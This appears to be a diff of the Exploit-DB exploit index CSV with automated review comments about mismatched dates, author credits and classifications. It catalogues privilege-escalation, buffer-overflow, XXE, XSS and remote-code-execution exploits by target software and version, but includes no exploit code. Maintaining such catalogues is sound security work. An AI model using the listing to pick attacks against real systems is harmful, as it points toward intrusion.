3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
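Review bot: the date column for 47728 and 47732 is 2019-12-02 while both files carry '# Date: 2019-11-30'; if the column records the Exploit-DB publication date rather than the discovery date that is expected, but the two entries are the same script with a different target field, so consider whether the 'Key' variant warrants a separate ID at all.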
@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
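Review bot: the author column for 47734 lists only 'Luis Catarino', while the file itself credits 'Luis Catarino & Pedro Rodrigues'; list both or use the same form as the file. Two classifications deserve a second look: 47734 is catalogued as local/windows although the exploit is delivered as a UDP broadcast to port 5060 on the network interface, and 47729 is catalogued as local/xml while its own '[Network Access]' field says Remote (47735, the Excel entry, says Local, so the two XXE advisories are inconsistent with each other as well as with the csv).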
@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port
47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,
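Review bot: the date for 47731 (2019-12-02) differs from the file's '# Date: 2019-12-01', and the description for 47730 ('Cross-Site Request Forgery') omits the reflected and stored XSS that make up most of that advisory; if the description is meant to mirror the file's title line, update both, since a search for SmartHouse XSS will not find this entry.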
